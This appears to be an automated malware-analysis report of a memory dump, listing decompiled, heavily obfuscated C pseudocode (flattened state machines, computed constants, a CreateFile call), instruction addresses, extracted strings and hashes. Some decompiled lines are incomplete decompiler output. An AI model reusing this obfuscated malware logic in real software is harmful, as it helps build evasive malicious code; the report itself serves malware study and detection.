									if(_t445 == 0x1b7bc3fb) {
										E0024F326();
										E0024F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002417AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x25c910);
												_t378 = E002488E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00254F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0024568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00254F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00248736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x25ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x25ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00248f78
0x00248f7e
0x00248f86
0x00248f8e
0x00248f96
0x00248f9b
0x00248fa3
0x00248fab
0x00248fb3
0x00248fb8
0x00248fbd
0x00248fc5
0x00248fcd
0x00248fd5
0x00248fdd
0x00248fea
0x00248ff1
0x00248ff7
0x00248ffc
0x00249001
0x00249007
0x0024900f
0x00249017
0x0024901f
0x00249024
0x0024902c
0x00249039
0x0024903c
0x00249040
0x00249048
0x00249050
0x0024905b
0x00249066
0x00249071
0x0024907c
0x00249087
0x00249092
0x0024909a
0x002490a2
0x002490a7
0x002490af
0x002490b7
0x002490bf
0x002490c7
0x002490cf
0x002490df
0x002490e8
0x002490eb
0x002490ef
0x002490f4
0x002490fc
0x00249104
0x0024910f
0x00249113
0x0024911b
0x00249123
0x0024912b
0x00249133
0x00249138
0x00249140
0x00249148
0x00249156
0x0024915b
0x00249161
0x00249169
0x00249176
0x00249179
0x0024917d
0x0024918d
0x00249191
0x00249199
0x002491a1
0x002491a6
0x002491ae
0x002491b3
0x002491bb
0x002491c8
0x002491cb
0x002491cf
0x002491d7
0x002491df
0x002491ea
0x002491f5
0x00249200
0x0024920b
0x00249213
0x0024921e
0x00249226
0x00249233
0x00249237
0x0024923f
0x00249247
0x0024924c
0x00249251
0x00249259
0x00249264
0x0024926f
0x0024927a
0x00249285
0x0024928d
0x00249298
0x002492a3
0x002492ae
0x002492b9
0x002492c1
0x002492c9
0x002492d1
0x002492d9
0x002492e6
0x002492e7
0x002492eb
0x002492f3
0x002492fb
0x00249309
0x0024930d
0x00249315
0x0024931d
0x00249325
0x0024932d
0x00249332
0x0024933a
0x00249342
0x0024934a
0x00249352
0x0024935a
0x00249362
0x0024936a
0x00249378
0x00249379
0x00249380
0x00249387
0x0024938b
0x00249393
0x0024939b
0x002493a0
0x002493a8
0x002493b0
0x002493b8
0x002493c2
0x002493c6
0x002493ce
0x002493d6
0x002493db
0x002493e3
0x002493eb
0x002493f3
0x002493fe
0x00249402
0x0024940a
0x00249417
0x0024941b
0x00249423
0x0024942b
0x00249433
0x00249433
0x00249433
0x00249438
0x00249438
0x00249438
0x0024943d
0x0024943d
0x0024943d
0x0024943d
0x0024943f
0x00000000
0x00000000
0x00249445
0x0024955a
0x0024955b
0x0024957f
0x00249584
0x00249589
0x0024959d
0x002495b5
0x002495ba
0x002495bb
0x002495c2
0x002495c9
0x002495d0
0x002495d0
0x002495d6
0x002495d6
0x00249433
0x00249433
0x00249433
0x00000000
0x00249433
0x0024944b
0x00249451
0x00000000
0x002496c1
0x0024945d
0x0024952e
0x00249535
0x00249541
0x00249546
0x0024954b
0x00000000
0x00249463
0x00249469
0x002494d8
0x00249511
0x00000000
0x002494da
0x002494da
0x002494e5
0x002494e7
0x002494f4
0x002494f9
0x002494fe
0x00249506
0x00249433
0x00249433
0x00249433
0x00249438
0x00249438
0x00000000
0x00249438
0x00249433
0x0024946b
0x00249471
0x00000000
0x00249477
0x00249485
0x00249486
0x0024948d
0x00249495
0x0024949b
0x002494b0
0x002494c1
0x002494c7
0x002494c7
0x002494cc
0x00249438
0x00249438
0x00249438
0x00000000
0x00249438
0x0024949d
0x002494a4
0x002494a9
0x00000000
0x002494a9
0x0024949b
0x00249471
0x00249469
0x0024945d
0x002495ec
0x002495f2
0x002495fa
0x00000000
0x00249600
0x00249600
0x00249601
0x0024960e
0x0024960f
0x0024960f
0x0024961a
0x0024961b
0x00249626
0x00249628
0x0024962d
0x00249632
0x00000000
0x00249634
0x00249643
0x00249648
0x0024964d
0x00249654
0x00000000
0x00249654
0x00000000
0x00249632
0x002496cc
0x002496cc
0x002496cc
0x0024965d
0x00249669
0x0024966a
0x0024966d
0x0024966e
0x00249673
0x00249679
0x0024967b
0x00000000
0x0024967b
0x00000000
0x00249679
0x002495e6
0x00249685
0x00249688
0x0024968d
0x00249692
0x00249695
0x0024969a
0x00000000
0x0024969a
0x00000000
0x002496a0
0x002496a0
0x00000000
0x0024943d
0x00249438

Strings

fpMl!, xrefs: 0024960F
}a, xrefs: 00249325
s5, xrefs: 0024921E
-, xrefs: 00249342
G1, xrefs: 00249362
~\, xrefs: 002491DF
#, xrefs: 002493CE
`H, xrefs: 002492FB
b{, xrefs: 002492A3
]V, xrefs: 00249050
Ml!, xrefs: 002494E7
@C, xrefs: 002492D9

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
API String ID: 0-964951681
Opcode ID: cf2f6cc7ff951b99f6350592d21d21d827c5738e7017695800310d92fffe3538
Instruction ID: 7c671332968b6f5ce3c5f3651cc25833ce719fc834bb3991f9ee661cd3207283
Opcode Fuzzy Hash: cf2f6cc7ff951b99f6350592d21d21d827c5738e7017695800310d92fffe3538
Instruction Fuzzy Hash: B902507260D3818FE368CF25D54AA4BFBE1BBC4708F50891DF1A9862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024E377, Relevance: 15.3, Strings: 12, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0024F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00248736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0024B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00253E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002428CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00256319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x25ca30; // 0x0
							E00258A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00248624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00254F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x0024e37d
0x0024e38a
0x0024e393
0x0024e39a
0x0024e39f
0x0024e3a7
0x0024e3ac
0x0024e3b4
0x0024e3bc
0x0024e3c4
0x0024e3c9
0x0024e3d1
0x0024e3d6
0x0024e3de
0x0024e3e6
0x0024e3f6
0x0024e401
0x0024e404
0x0024e408
0x0024e410
0x0024e418
0x0024e41d
0x0024e425
0x0024e42d
0x0024e435
0x0024e43d
0x0024e442
0x0024e44a
0x0024e452
0x0024e45a
0x0024e467
0x0024e46b
0x0024e473
0x0024e47b
0x0024e483
0x0024e48b
0x0024e493
0x0024e49b
0x0024e4a8
0x0024e4ac
0x0024e4b4
0x0024e4c4
0x0024e4c8
0x0024e4d0
0x0024e4d8
0x0024e4e0
0x0024e4e8
0x0024e4f0
0x0024e4f8
0x0024e500
0x0024e505
0x0024e50d
0x0024e515
0x0024e521
0x0024e524
0x0024e528
0x0024e530
0x0024e53b
0x0024e546
0x0024e551
0x0024e559
0x0024e55e
0x0024e563
0x0024e56b
0x0024e573
0x0024e57d
0x0024e582
0x0024e58a
0x0024e592
0x0024e597
0x0024e59f
0x0024e5a7
0x0024e5af
0x0024e5b7
0x0024e5bf
0x0024e5c7
0x0024e5cf
0x0024e5d7
0x0024e5df
0x0024e5e7
0x0024e5ef
0x0024e5f7
0x0024e5ff
0x0024e607
0x0024e60f
0x0024e61e
0x0024e61f
0x0024e629
0x0024e62d
0x0024e635
0x0024e63d
0x0024e645
0x0024e64d
0x0024e655
0x0024e668
0x0024e66f
0x0024e67a
0x0024e682
0x0024e68a
0x0024e68f
0x0024e697
0x0024e69f
0x0024e6a4
0x0024e6ac
0x0024e6bf
0x0024e6c6
0x0024e6d1
0x0024e6dc
0x0024e6e7
0x0024e6f2
0x0024e6fa
0x0024e6ff
0x0024e707
0x0024e712
0x0024e71d
0x0024e728
0x0024e730
0x0024e738
0x0024e73d
0x0024e742
0x0024e74a
0x0024e752
0x0024e75a
0x0024e75f
0x0024e767
0x0024e77a
0x0024e781
0x0024e78c
0x0024e799
0x0024e79d
0x0024e7a5
0x0024e7ad
0x0024e7b5
0x0024e7bd
0x0024e7c5
0x0024e7cd
0x0024e7d5
0x0024e7da
0x0024e7e4
0x0024e7eb
0x0024e7f2
0x0024e7f9
0x0024e7fd
0x0024e805
0x0024e817
0x0024ea0c
0x0024ea13
0x00000000
0x0024ea13
0x0024e823
0x0024e9d2
0x0024e9d3
0x0024e9d9
0x0024e9ea
0x0024e9ed
0x0024e9f4
0x00000000
0x0024e9f4
0x0024e82f
0x0024e9a9
0x0024e9ae
0x0024e9b0
0x0024e9b3
0x0024e9b6
0x0024ea3d
0x0024ea40
0x0024ea49
0x0024ea49
0x0024e9bc
0x00000000
0x0024e9bc
0x0024e83b
0x0024e93e
0x0024e952
0x0024e957
0x0024e959
0x0024e95e
0x0024e963
0x00000000
0x0024e963
0x0024e847
0x0024e925
0x00000000
0x0024e925
0x0024e84f
0x0024ea31
0x0024ea31
0x0024ea37
0x00000000
0x00000000
0x00000000
0x0024ea37
0x0024e88c
0x0024e891
0x0024e896
0x0024e8cf
0x0024e8e4
0x0024e8e4
0x0024e8e6
0x0024e91e
0x0024e8e8
0x0024e8ef
0x0024e90c
0x0024e911
0x0024e914
0x0024e914
0x00000000
0x0024e8e6
0x0024e898
0x0024e89a
0x0024e8b9
0x0024e8bd
0x0024e8d8
0x0024e8df
0x0024e8df
0x00000000
0x0024e8df
0x0024e8bf
0x0024e8bf
0x0024e8c5
0x0024e8c6
0x00000000
0x0024e8c6
0x0024ea26
0x0024ea2c
0x00000000

Strings

o, xrefs: 0024E712
M:, xrefs: 0024E505
HH, xrefs: 0024E7AD
^, xrefs: 0024E59F
n`, xrefs: 0024E44A
|E, xrefs: 0024E5AF
?, xrefs: 0024E6E7
ve(, xrefs: 0024E7DA
ve(, xrefs: 0024E8DF
h|, xrefs: 0024E483
w]4S, xrefs: 0024E56B
&!, xrefs: 0024E74A

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: 78eebcc4842ebbe5faaea608920eff7c6007b7b8075b8af8fd909fb07d1be1cc
Instruction ID: 8351d97c2a9c068d56d331ee927e17f982bab9c1bdbeffb8cd231b2a6a88766a
Opcode Fuzzy Hash: 78eebcc4842ebbe5faaea608920eff7c6007b7b8075b8af8fd909fb07d1be1cc
Instruction Fuzzy Hash: 1FF12E715183819FE7A8CF25C54AA5FBBF1BBC5708F108A1DE1DA862A0D7B58919CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00256DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00256DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0024602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
